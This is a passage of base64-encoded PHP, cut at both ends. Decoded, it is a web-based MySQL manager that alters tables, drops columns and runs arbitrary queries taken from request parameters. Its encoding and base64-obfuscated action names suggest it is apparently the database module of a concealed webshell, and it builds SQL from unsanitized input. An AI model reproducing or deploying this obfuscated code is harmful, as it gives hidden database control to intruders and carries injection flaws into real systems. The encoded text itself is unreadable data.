zwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT